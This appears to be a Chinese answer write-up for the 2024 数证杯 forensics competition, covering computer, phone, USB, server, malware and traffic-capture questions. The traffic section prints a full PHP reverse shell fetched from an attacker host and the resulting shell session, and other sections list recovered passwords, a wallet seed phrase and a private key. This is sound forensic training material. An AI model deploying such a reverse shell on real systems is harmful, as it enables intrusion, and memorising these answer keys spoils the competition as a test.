2024数证杯初赛
容器密码
/TP2G-h`q#(Ss!EUq,RR:Ss9"@!R"{-.kNw+-(gwGq.YLDS-|NEWH(GT3;6;
参考答案
U盘
https://mp.weixin.qq.com/s/JmY6-zPnTFuoLPYJbXfZYQ?nwr_flag=1#wechat_redirect
计算机、手机、数据分析
https://mp.weixin.qq.com/s/m0dYixT4Xi1gvK1ggXWr0g?nwr_flag=1#wechat_redirect
https://blog.csdn.net/2301_79200709/article/details/143828185
流量:
https://mp.weixin.qq.com/s/4bluvN_S2HAC9v3TVMP_HQ?nwr_flag=1#wechat_redirect
程序功能:
https://mp.weixin.qq.com/s/1awjjbaF117xjMA2akyTdw?nwr_flag=1#wechat_redirect
计算机取证
密码:

jlb654321
1.对计算机镜像进行分析,计算该镜像中ESP分区的SM3值后8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

2.对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为UTC+08:00)(答案格式如:1970-01-01 00:00:00) (2分)
登出=注销

2024-10-25 22:57:32
3.对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234) (2分)

24
4.对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234) (2分)

42
5.对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23) (2分)

5.86
6.对计算机镜像进行分析,该操作系统接入过一名称为“Realtek USB Disk autorun USB Device”的USB设备,其接入时分配的盘符为?(答案格式:A:) (2分)

E
7.对计算机镜像进行分析,该操作系统无线网卡分配的默认网关地址为?(答案格式:127.0.0.1) (2分)

192.168.43.1
8.对计算机镜像进行分析,该操作系统配置的连接NAS共享文件夹的IP地址为?(答案格式:127.0.0.1) (2分)

192.168.188.1
9.对计算机镜像进行分析,写出“吵群技巧.txt”文件SM3值的后8位?(大写字母与数字组合,如:D23DDF44) (2分)
解压出来
80A1D56BB983B51401035AC688C68286D807C2C14E1B002674E3ACBD151515BA
10.对计算机镜像进行分析,该操作系统通过SSH连接工具连接CCTalk测试环境的SSH端口为?(填写数字,答案格式如:1234) (2分)

12849
11.对计算机镜像进行分析,该操作系统通过SSH连接工具连接的CCTalk境外服务器是哪个运营商的?(填写汉字,答案格式:阿里云) (2分)


回收站里的临时文件

18.55.213.79


亚马逊云
12.对计算机镜像进行分析,获取机主保存在本机的U盾序号的后4位数字为?(填写数字,答案格式如:1234) (2分)


6409
13.对计算机镜像进行分析,机主存储的某篇新闻报道“小程序搅动资源争夺战”的发表年份为?(答案格式:2024) (2分)


2019
14.对计算机镜像进行分析,该操作系统访问“环球商贸”的IP地址为?(答案格式:127.0.0.1) (2分)

39.108.126.128
15.对计算机镜像进行分析,“环球商贸”服务器配置的登录密码为?(答案按照实际填写,字母存在大小写) (2分)

LnxBUXEMESGQ6fcB1PwFtTEkqFavMB6qzeWZhCe4pj0=
HQSM#20231108@gwWeB
16.对计算机镜像进行分析,机主安装的PC-Server服务环境的登录密码是?(答案按照实际填写,字母全小写) (2分)

SGtAJx47dC0x51qbUIgKJG3d5yAghF4D

jlb654321
17.对计算机镜像进行分析,机主搭建的宝塔面板的安全入口为?(按实际值填写) (2分)

/c38b336a
18.对计算机镜像进行分析,机主搭建的宝塔环境中绑定的宝塔账号是?(按实际值填写) (4分)

igmxcdsa
*Hyper-V宝塔面板复原
Hyper-V开启
密码为之前解密的jlb654321
jlbvpc
jlb654321
登录成功
19.对计算机镜像进行分析,其搭建的宝塔面板的登录密码为?(按实际值填写) (2分)

123456
20.对计算机镜像进行分析,机主搭建的宝塔环境中绑定的宝塔账号是?(按实际值填写) (4分)
查看宝塔面板的userinfo.json

17859628390
21.对计算机镜像进行分析,机主搭建的宝塔面板中Mysql环境的root密码为?(按实际值填写) (4分)
思路1:搭建起来看

思路2 本机mysql连接

123456
22.对计算机镜像进行分析,机主搭建的宝塔面板中Mysql环境连接的端口号为?(填写数字,答案格式如:1234) (2分)
3306
23.接上题,“卡号分组”表所在的数据库名为?(答案按照实际填写,字母全小写) (4分)

a_train2023
24.接上题,“孙华锦”在2020-07-01 10:49:07时间节点的交易余额为?(答案格式:1234.56) (4分)
思路1:
数据库备份查看

思路2:


6610.94
25.对U盘镜像进行分析,其镜像中共有几个分区?(填写数字,答案格式如:1234) (2分)
*U盘详细查看
R-Studio直接扫描,MBR中识别出来的两个分区

DBR皆被损坏,无法正常解析文件系统
点击扫描,通过格式化恢复,可以扫描出两个分区,与MBR记录的对应起来。

看到分区一的DBR区全是0
看到分区二的DBR区全是F
修复思路就是修复DBR区即可
DBR区修复
FAT32:
EB58904D53444F53352E3000020862190200000000F800003F00FF000008000000580D004F030000000000000200000001000600000000000000000000000000800029F2E019B24E4F204E414D4520202020464154333220202033C98ED1BCF47B8EC18ED9BD007C885640884E028A5640B441BBAA55CD13721081FB55AA750AF6C1017405FE4602EB2D8A5640B408CD137305B9FFFF8AF1660FB6C640660FB6D180E23FF7E286CDC0ED0641660FB7C966F7E1668946F8837E16007539837E2A007733668B461C6683C00CBB0080B90100E82C00E9A803A1F87D80C47C8BF0AC84C074173CFF7409B40EBB0700CD10EBEEA1FA7DEBE4A17D80EBDF98CD16CD196660807E02000F842000666A0066500653666810000100B4428A56408BF4CD136658665866586658EB33663B46F87203F9EB2A6633D2660FB74E1866F7F1FEC28ACA668BD066C1EA10F7761A86D68A56408AE8C0E4060ACCB80102CD1366610F8274FF81C300026640497594C3424F4F544D475220202020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0A4469736B206572726F72FF0D0A507265737320616E79206B657920746F20726573746172740D0A0000000000000000000000000000000000000000000000000000000000000000000000AC01B901000055AA
NTFS
EB52904E5446532020202000020800000000000000F800003F00FF0080000000000000008000800000500E0000000000AA980000000000000200000000000000F6000000010000003F0D93B22D93B29A00000000FA33C08ED0BC007CFB68C0071F1E686600CB88160E0066813E03004E5446537515B441BBAA55CD13720C81FB55AA7506F7C101007503E9DD001E83EC18681A00B4488A160E008BF4161FCD139F83C4189E581F72E13B060B0075DBA30F00C12E0F00041E5A33DBB900202BC866FF06110003160F008EC2FF061600E84B002BC877EFB800BBCD1A6623C0752D6681FB54435041752481F90201721E166807BB166852111668090066536653665516161668B80166610E07CD1A33C0BF0A13B9F60CFCF3AAE9FE01909066601E0666A111006603061C001E66680000000066500653680100681000B4428A160E00161F8BF4CD1366595B5A665966591F0F82160066FF06110003160F008EC2FF0E160075BC071F6661C3A1F601E80900A1FA01E80300F4EBFD8BF0AC3C007409B40EBB0700CD10EBF2C30D0A41206469736B2072656164206572726F72206F63637572726564000D0A424F4F544D475220697320636F6D70726573736564000D0A5072657373204374726C2B416C742B44656C20746F20726573746172740D0A000000000000000000000000000000000000000000008A01A701BF01000055AA
winhex使用编辑模式
进入偏移地址
00100000
1AC10000

右键---->编辑---->剪贴板数据---->写入,选择Hex模式
粘贴成功
同理
识别成功

26.对U盘镜像进行分析,其中FAT32主分区的FAT表数量有几个?(请使用十进制数方式填写答案,答案格式:1234) (2分)

2个
2
27.对U盘镜像进行分析,其中FAT32主分区定义的每扇区字节数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

簇(Cluster)确实是文件系统中最小可分配的空间单位
簇大小为4K,8个扇区,定义的扇区大小为512
4×1024 ÷ 8 =512
512
28.对U盘镜像进行分析,其中FAT32主分区的文件系统前保留扇区数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)
在分区开始处保留的一段扇区,这段扇区不包含任何文件系统数据,而是用于其他目的。这些保留扇区通常用于存放一些重要的系统信息或引导代码。
FAT32主分区文件系统前的保留扇区数,指的是FAT32文件系统分区起始到FAT1表位置的扇区数。

1.找到FAT32文件系统起始位置
FSINFO一般位于文件系统的1号扇区,就是DBR的下一个扇区。它用来记录文件系统中空闲簇的数量以及下一可用簇的簇号等信息。
扩展引导标志“52 52 61 41”
因为0x10200位置为FAT32的FSINFO扇区标识,所以说0x100000是分区起始位置
2.找到FAT表数据的第一个表项数据
搜索F8 FF FF 0F,找到0x496200是FAT表起始位置

开始计算保留扇区:
扇区16进制转化
(0x496200-0x100000)/0x200
7345
29.对U盘镜像进行分析,其中FAT32主分区的FAT1表相对于整个磁盘的起始扇区数为?(请使用十进制数方式填写答案,答案格式:1234) (2分)
FAT表起始位置,位于0x496200位置

9393
30.对U盘镜像进行分析,其中NTFS逻辑分区的$MFT起始簇号为?(请使用十进制数方式填写答案,答案格式:1234) (2分)

39082
31.对U盘镜像进行分析,其中NTFS逻辑分区的簇大小为多少个扇区?(请使用十进制数方式填写答案,答案格式:1234) (4分)

8
32.对U盘镜像进行分析,请从该镜像的两个分区中找出使用“新建文本文档.txt”记录的同一个MD5值的两部分信息,并写出该MD5值的第13--20位字符串。(答案格式:大写字母与数字组合,如:D23DDF44) (4分)
发现一个打不开的图片


补全文件开头签名

FAT32分区的成功打开:

同理NTFS:

D668AEE2
手机取证
1.对手机镜像进行分析,机主微信ID号为?(答案按照实际填写,字母全小写) (2分)

wxid_gvlyzqeyg83o22
2.对手机镜像进行分析,机主在2023年12月登录宝塔面板使用的验证码为?(填写数字,答案格式如:1234) (2分)

482762
3.对手机镜像进行分析,小众即时通讯“鸽哒”应用程序的最后更新时间为?(答案格式如:1970-01-01 00:00:00) (2分)

2024-09-20 09:25:19
*鸽哒小众软件取证


VC信息
4.对手机镜像进行分析,该手机中记录的最后一次开机时间。(答案格式如:1970-01-01 00:00:00) (2分)
2024-10-24 11:27:14
5.对手机镜像进行分析,该手机中高德地图APP应用的登录ID为?(答案按照实际填写) (2分)
950980338
6.对手机镜像进行分析,该手机中高德地图APP应用登录账号头像的SHA-256值前8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)

位置为:
AppAttach\GaoDeMap\2gxjmblm36vho415yyv8ik8q20

572589da
7.对手机镜像进行分析,其中20220207-20230206的微信账单文件的解压密码为?(答案格式:按实际值填写) (2分)

在图片里找
847905
8.对手机镜像进行分析,机主在手机中存储的一张复古土砌矮墙照片的拍摄地为哪个城市?(答案格式:北京市) (2分)


景德镇市
9.对手机镜像进行分析,通过AI合成的人脸照片中,有几张照片是通过本机当前安装的AI照片合成工具生成,并有对应记录的?(填写数字,答案格式如:1234) (4分)


可疑包名

3条记录
3
10.对手机镜像进行分析,统计出通讯录号码归属地第二多的省份是?(答案格式:广东) (4分)

导出

福建
11.对手机镜像进行分析,找出“季令柏”身份证号后4位为?(答案格式:1234) (2分)
在本地查看

打不开
用winhex查看,补全文件头:
可以打开了
8043
12.对手机镜像进行分析,找出接收“葵花宝典1.doc”文件使用的应用程序的第一次安装时间为?(答案格式如:1970-01-01 00:00:00) (2分)

查看telegram第一次安装时间

2024-09-20 09:29:40
13.对手机镜像进行分析,机主使用的小众即时通讯应用使用的服务器IP为?(答案格式:127.0.0.1) (2分)
鸽哒数据库查看

163.179.125.64
14.对手机镜像进行分析,机主在哪个平台上发布过转让传奇游戏币的信息,请写出该平台应用APP的包名?(答案格式:com.abcd) (4分)

com.jiuwu
15.对手机镜像进行分析,其中有一“双色球”网页的玩法规则中定义的“三等奖”的奖金是多少?(填写数字,答案格式如:1234) (4分)
关键词中奖

https://www.lottery.gov.cn/dlt/index.html
https://www.lottery.gov.cn/jc/index.html
https://www.lottery.gov.cn/cz/index.html
https://www.lottery.gov.cn/xdgg/
https://www.lottery.gov.cn/plwf/index.html
https://www.lottery.gov.cn/qxc/index.html
https://www.cwl.gov.cn/fcpz/yxjs/ssq/
https://www.cwl.gov.cn/fcpz/yxjs/ggl/
https://www.cwl.gov.cn/fcpz/yxjs/fc3d/
https://www.cwl.gov.cn/fcpz/yxjs/kl8/

3000
16.对手机镜像进行分析,找出手机连接过的米家摄像头终端设备的用户ID为?(答案格式:答案按照实际填写) (2分)
2968704175
17.对手机镜像进行分析,找出手机连接过的米家摄像头终端设备的IP地址为?(答案格式:127.0.0.1) (4分)

117.31.116.56
数据分析
1.对计算机,手机,U盘镜像检材综合分析,找出计算机中VC加密容器使用的登录密钥文件,其中逻辑大小较小的文件占用多少个字节?(答案格式:1234) (4分)
从手机检材中找到VC解密方式,登录密钥文件为桌面上finalshell+winhex的快捷方式
挂载设备
选择秘钥文件挂载
挂载成功
较小的文件为WinHex快捷方式
1561
2.对计算机,手机,U盘镜像检材综合分析,写出存储的“带彩计划.txt”文件的SM3哈希值前8位;(大写字母与数字组合,如:D23DDF44) (2分)
AF30FFA1
3.对计算机,手机,U盘镜像检材综合分析,写出存储的“Shakepay买币,提币流程.ppt”文件在当前分区的起始簇号;(填写数字,答案格式如:1234) (4分)

44378
4.对计算机,手机,U盘镜像检材综合分析,写出存储在手机中,用于访问钱包地址的网站登录密码;(答案按照实际填写,字母全大写) (4分)
5.对计算机,手机,U盘镜像检材综合分析,写出存储的钱包地址的前8位;(答案格式:abcd1234) (4分)

fall scene sleep citizen sample drift always danger wait rich leisure vague
浏览器中的以太坊钱包


0x91cCcA87583969193D87e8A890Beb396687b36c0
思路2:

0x91cCcA87583969193D87e8A890Beb396687b36c0
6.对计算机,手机,U盘镜像检材综合分析,写出存储的钱包地址私钥的前8位;(答案格式:abcd1234) (4分)
思路2:

e87dca4ce90cdc372dcb3b83a4b06940daa7b41534a2b4d6906abe6d1f861108
7.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的转入金额第三高的“对方卡号”字段的值为?(答案格式:汉字) (2分)
8.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的“对方卡号”字段值为“陈建设”的转出净值为?(填写数字,答案格式如:1234) (2分)
9.对计算机,手机,U盘镜像检材综合分析,统计出机主微信账单从210207-240206期间发生的交易笔数第三多的数量为?(填写数字,答案格式如:1234) (2分)
10.对数据分析检材中的第01-数据进行分析,办案人员从多个赌博网站中导出了100多份的报表,请统计出所有平台会员使用本币充值的总金额是多少?(答案格式:仅数字,结果不保留小数) (2分)
11.对数据分析检材中的第02-数据进行分析,办案人员在电脑中找到多个赌博网站的交易流水报表,每个报表都是以网站编号和年份命名,每个月独立生成一个sheet页。请统计出所有的交易流水总金额是多少?(答案格式::123456) (2分)
12.对数据分析检材中的第03-数据进行分析,请从赌博平台的用户登录日志表中,统计出2020年1月1号至2020年6月30号,总共有多少位会员登录了该平台?(答案格式:123456) (2分)
13.对数据分析检材中的第03-数据进行分析,通过还原赌博平台数据库备份文件,请统计用户投注总次数前5的彩种开奖总次数?(涉及的数据库表:ssc2022_bets,ssc2022_data)(答案格式:123456) (4分)
14.对数据分析检材中的第03-数据进行分析,请统计出在不止一种彩种上进行过投注的用户数量,并计算他们在2018年一共涉及了平台多少流水?(答案格式:保留三位有效数字,如:123.123) (4分)
服务器取证
1.对服务器检材进行分析,站点服务器可能是从哪个云服务平台上调证过来的?(填写汉字,答案格式:亿速云) (2分)

阿里云
2.对服务器检材进行分析,站点服务器中数据库的密码是?(按实际值填写) (2分)
发现激活的配置文件是sxj。
Spring Boot允许根据不同的环境(如开发、测试、生产等)加载不同的配置文件,这里指定了使用名为sxj的配置文件。

发现密码

Sxy000**
3.对服务器检材进行分析,站点服务器用于提供服务发现的工具名是?(答案格式:zookeeper) (4分)
看历史记录
consul
4.对服务器检材进行分析,站点服务器数据库配置文件名是?(答案格式:database.php) (2分)
application-sxj.yaml
5.对服务器检材进行分析,该网站涉及的APP名称是?(答案格式:微信) (2分)
顺心借
6.对服务器检材进行分析,该网站用于存储大量身份证照的OSS中的AccessKeyID后八位是?(答案格式:按实际值填写) (2分)

EuZJybzD
7.对服务器检材进行分析,站点服务器用于消息转发代理工具所使用的端口号是?(填写数字,答案格式:3306) (2分)
RabbitMQ是实现了高级消息队列协议的开源消息代理软件
5672
8.对服务器检材进行分析,站点服务器用于启动定时任务的代码片段存在于?(答案格式:LoginIndex.class) (4分)

MobileStatusTask.class
9.对服务器检材进行分析,站点服务器用于验证用户输入的验证码是否匹配的代码片段存在于?(答案格式:LoginIndex.class) (4分)

AdminIndexConller.class
10.对服务器检材进行分析,数据库服务器中Docker容器镜像中mysql的镜像ID号前6位是?(答案格式:123asd) (2分)

23b013
11.对服务器检材进行分析,数据库服务器中DockerCompose的版本号是?(答案格式:1.1.1) (2分)
find / -name docker-compose
返回:
/usr/libexec/docker/cli-plugins/docker-compose
chmod +x docker-compose
./docker-compose -v
返回:
Docker Compose version v2.27.1
2.27.1
12.对服务器检材进行分析,数据库服务器中用于存储后台登录账号的数据表名是?(答案格式:login) (2分)

sys_user
13.对服务器检材进行分析,后台管理员“xpt-0”所绑定的手机号码是?(答案格式:13001880188) (2分)
同上
19521510863
*服务器搭建
查看mysql地址

rm-bp18td28bsh13f5jy.mysql.rds.aliyuncs.com
我数据库重组ip为172.19.62.72,端口为9734

首先host添加172.19.62.72
vim /etc/hosts

测试连接成功:

改jar包端口

查看前端
netstat -nltp | grep nginx

去对应端口测试

发现API访问的是47.96.140.186端口,改为system的ip
vscode一搜都是
发现使用的ip是47.96.140.186,因此需要替换/www/admin中所有的47.96.140.186变成我们system.E01的ip
find /www/admin -type f -name "*.js" -exec sed -i 's/47.96.140.186/192.168.160.131/g' {} +
修改成功

启动rabbitmq
systemctl start rabbitmq-server.service
启动失败,分析/var/lib/rabbitmq/erl_crash.dump
分析工具:https://github.com/ferd/recon/blob/master/script/erl_crashdump_analyzer.sh
chmod +x erl_crashdump_analyzer.sh
./erl_crashdump_analyzer.sh erl_crash.dump
返回结果:
analyzing erl_crash.dump, generated on: Wed Nov 20 16:03:44 2024
Slogan: Kernel pid terminated (application_controller) ({application_start_failure,rabbitmq_prelaunch,{{shutdown,{failed_to_start_child,prelaunch,{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}}},{rabbit_prelaunch_app,start,[normal,[]]}}})
Memory:
===
processes: 12 Mb
processes_used: 12 Mb
system: 12 Mb
atom: 0 Mb
atom_used: 0 Mb
binary: 0 Mb
code: 6 Mb
ets: 1 Mb
---
total: 25 Mb
Different message queue lengths (5 largest different):
===
1 1
9 0
Error logger queue length:
===
File descriptors open:
===
UDP: 0
TCP: 0
Files: 0
---
Total: 0
Number of processes:
===
10
Processes Heap+Stack memory sizes (words) used in the VM (5 largest different):
===
1 6772
1 2586
1 1598
5 233
2 4
Processes OldHeap memory sizes (words) used in the VM (5 largest different):
===
1 28690
1 987
1 376
1 OldHeap unused: 692
1 OldHeap unused: 352
Process States when crashing (sum):
===
1 CONNECTED
1 Current Process Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | ACTIVE | RUNNING
1 Current Process Running
3 Internal ACT_PRIO_HIGH | USR_PRIO_HIGH | PRQ_PRIO_HIGH | OFF_HEAP_MSGQ
1 Internal ACT_PRIO_MAX | USR_PRIO_MAX | PRQ_PRIO_MAX | OFF_HEAP_MSGQ
4 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL
1 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | ACTIVE | RUNNING
1 Internal ACT_PRIO_NORMAL | USR_PRIO_NORMAL | PRQ_PRIO_NORMAL | OFF_HEAP_MSGQ
1 Running
9 Waiting
关键部分:
Slogan: Kernel pid terminated (application_controller) ({application_start_failure,rabbitmq_prelaunch,{{shutdown,{failed_to_start_child,prelaunch,{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}}},{rabbit_prelaunch_app,start,[normal,[]]}}})
解释关键部分:
{epmd_error,"iZbp1gma2uf9hvsnbu9mdkZ",timeout}: 具体的失败原因是 EPMD(Erlang Port Mapper Daemon)与主机 "iZbp1gma2uf9hvsnbu9mdkZ" 的通信超时。
解析iZbp1gma2uf9hvsnbu9mdkZ超时,查看hosts文件

改为
127.0.0.1 iZbp1gma2uf9hvsnbu9mdkZ

测试成功

systemctl start rabbitmq-server.service
成功启动,出现端口号5672:
启动/root/consul.sh
./consul.sh
查看端口是否启动
启动/data/jar.sh
java -jar cal-0.0.1-SNAPSHOT.jar
进入网页发送验证码给咱们启用的用户13238424249
密码为Sxy000**
使用13238424249手机号
Redis 命令用于设置一个键值对并为其设置过期时间,单位为秒
SET ADMIN-PHONE13238424249 1234
EXPIRE ADMIN-PHONE13238424249 600


验证码填1234

14.对服务器检材进行分析,用户首次借款初始额度是?(填写数字,答案格式:1) (2分)

4000
15.对服务器检材进行分析,受害者在平台中一共结款了几次?(填写数字,答案格式:1) (2分)

1857
16.对服务器检材进行分析,该平台中所有下单用户成功完成订单总金额是?(填写数字,答案格式:1) (2分)

11066700
17.对服务器检材进行分析,该平台中逾期费率是?(答案格式:1.1) (2分)

0.1
18.对服务器检材进行分析,该平台中累计还款总金额是?(填写数字,答案格式:1) (2分)

10194700
19.对服务器检材进行分析,该平台总共设置了多少种借款额度?(填写数字,答案格式:1) (2分)

有一个禁用
18
20.对服务器检材进行分析,该平台一共有多少个借款渠道?(填写数字,答案格式:1) (2分)

131
21.对服务器检材进行分析,该平台对已完成用户收取了总计多少元服务费,结果精确到整数?(填写数字,答案格式:123) (2分)

4051915
程序功能分析
1.对exe程序检材进行分析,计算程序的MD5(128bit)校验值的最后八位是?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)
对安全性未知或可疑的exe程序进行分析时推荐在虚拟机环境中进行操作,防止运行exe时释放病毒、木马感染宿主机
mmc.exe是系统管理程序的一个框架程序,全称是Microsoft Management Console,它提供给扩展名为msc的管理程序一个运行的平台
运行Procmon64.exe进程监控程序,设置过滤条件,如下图,分别在下拉中选择
“Process Name”“is”“mmc.exe”点击“Add”
“Operation” “is” “WriteFile”点击“Add”

释放样本文件:

C:\Users\ddxl\AppData\Local\Temp\《国际论坛》外审专家邀请函与文章评审单.docx
C:\Program Files\Cloudflare\Warp.exe
C:\Program Files\Cloudflare\7z.dll
计算Warp.exe
93ff791e
2.对exe程序检材进行分析,找出其释放的可执行程序的路径?(答案格式:D:\Document\Aaaa) (2分)
C:\Program Files\Cloudflare
3.对exe程序检材进行分析,找出其启动释放的可执行程序时命令的最后一个参数是什么?(答案格式:按实际值填写) (2分)
在任务管理器中查看Warp.exe进程的命令行参数,可知,其启动参数为“t 8.8.8.8”,最后一个参数为“8.8.8.8”

8.8.8.8
4.对exe程序检材进行分析,该程序在执行时,会解密并写入一段字节码到Chakra模块的一个特定导出函数的内存地址中,以此来伪装调用的目的,请给出这个导出函数的名称?(答案格式:按实际函数名称填写) (2分)
使用x32dbg.exe程序对Warp.exe进行动态调试分析
5.对exe程序检材进行分析,请问Chakra模块的代码段被修改了多少字节(答案格式:0x1122) (2分)
6.对exe程序检材进行分析,解密出的字节码数据中携带着PE格式的数据,并且_IMAGE_NT_HEADERS头部的PE签名已经被修改,请给出修改后的签名值(答案格式:0x11 0x22) (2分)
7.对exe程序检材进行分析,解密出的字节码数据中携带着PE格式的数据,并且节区数据被加密,请分析给出解密第一个节区时使用的秘钥(答案格式:0x1B 0x22 0x33 0x4A) (4分)
8.对exe程序检材进行分析,这份字节码数据解密前的密文第一个字节是什么(例如:0x1B) (4分)
9.分析检材APK中检材-01.apk,获取其md5(128bit)校验值的后八位?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)
ceaebf87
10.分析检材APK中检材-01.apk,请写出app的包名?(答案格式:com.xxx.xxx) (2分)
com.changbo.pro
11.接上题,请给出app的加固方式;(答案格式:梆梆) (2分)
360加固宝
12.接上题,请给出app启动时主页面显示的activity名称;(答案格式:com.xxx.xxx.Mainactivity) (2分)
com.changbo.pro.ui.splash.SplashActivity
13.分析检材APK中检材-01.apk,请给出加密的访问地址的数据是? (4分)

记住这么个路径吧
14.分析检材APK中检材-01.apk,请给出解密后的域名为?(答案格式:需要加上端口号,如: http://tieba.com:6666 ) (4分)

脱壳后重新分析



15.接上题,请给出解密调用的so的名称;(答案格式:abc_amm) (4分)
16.对检材APK中检材-02.apk分析,获取其中的flag;(答案格式:flag{ISEC-C6d-ddd-7gd}) (4分)
17.对检材APK中检材-03.apk分析,获取其中的flag;(答案格式:flag{ISEC-C6d-ddd-7gd}) (4分)
网络流量分析
1.分析网络流量包检材,写出抓取该流量包时所花费的秒数?(填写数字,答案格式:10) (2分)
3504
2.分析网络流量包检材,抓取该流量包时使用计算机操作系统的build版本是多少?(答案格式:10D32) (2分)
23F79
3.分析网络流量包检材,受害者的IP地址是?(答案格式:192.168.1.1) (2分)
总体看应该是192.168.75.131

后文具体分析了
192.168.75.131
4.分析网络流量包检材,受害者所使用的操作系统是?(小写字母,答案格式:biwu) (2分)
ubuntu
5.分析网络流量包检材,攻击者使用的端口扫描工具是?(小写字母,答案格式:abc) (2分)

nmap
6.分析网络流量检材,攻击者使用的漏洞检测工具的版本号是?(答案格式:1.1.1) (2分)
User-Agent里面看

3.1.0
7.分析网络流量包检材,攻击者通过目录扫描得到的 phpliteadmin 登录点是?(答案格式:/abc/abc.php) (2分)
往上扫描了很多,最后只有http://192.168.75.131/dbadmin返回了301

往下,看/dbadmin/test_db.php,查看数据包内容
查看数据包内容,是login登录信息

/dbadmin/test_db.php
8.分析网络流量包检材,攻击者成功登录到 phpliteadmin 时使用的密码是?(答案格式:按实际值填写) (2分)
思路:
http and http.request.method==POST and http contains "login"

选第一个
显示为HTML
看另一个
登录成功了


admin
9.分析网络流量包检材,攻击者创建的 phpinfo 页面文件名是?(答案格式:abc.txt) (4分)
http and http contains "phpinfo"

查看第四个

攻击者创建的 phpinfo 页面文件名是demo.php

demo.php
10.分析网络流量包检材,攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是?(答案格式:abc.txt) (4分)
由第4题可知受害者使用的操作系统为ubuntu,在ubuntu中最为常见的下载工具是wget,因此在过滤栏中输入命令
http contains "wget"
进行过滤,可知攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是rev.txt

rev.txt
11.分析网络流量包检材,攻击者反弹shell的地址及端口是?(答案格式:192.168.1.1:1234) (4分)
http contains "shell"
追踪最后一个
GET /rev.txt HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: 192.168.75.132:2000
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.11.8
Date: Wed, 31 Jul 2024 06:44:32 GMT
Content-type: text/plain
Content-Length: 2425
Last-Modified: Wed, 31 Jul 2024 06:43:54 GMT
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.75.132';
$port = 30127;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
192.168.75.132:30127
12.分析网络流量包检材,攻击者电脑所使用的Python版本号是?(答案格式:1.1.1) (2分)
HTTP的头信息中可知攻击者电脑所使用的Python版本号是3.11.8
Server: SimpleHTTP/0.6 Python/3.11.8
3.11.8
13.分析网络流量包检材,受害者服务器中网站所使用的框架结构是?(答案格式:thinkphp) (2分)
由第11题可知攻击者反弹shell的端口是30127,反弹shell是tcp协议,使用命令
not http and tcp.flags.push==1 and tcp.port==30127

Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
14:44:32 up 35 min, 0 users, load average: 0.01, 0.04, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
pwd
/
$
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
vagrant
var
vmlinuz
$
ls /home
zico
$
cd /home/zico
$
ls
bootstrap.zip
joomla
startbootstrap-business-casual-gh-pages
to_do.txt
wordpress
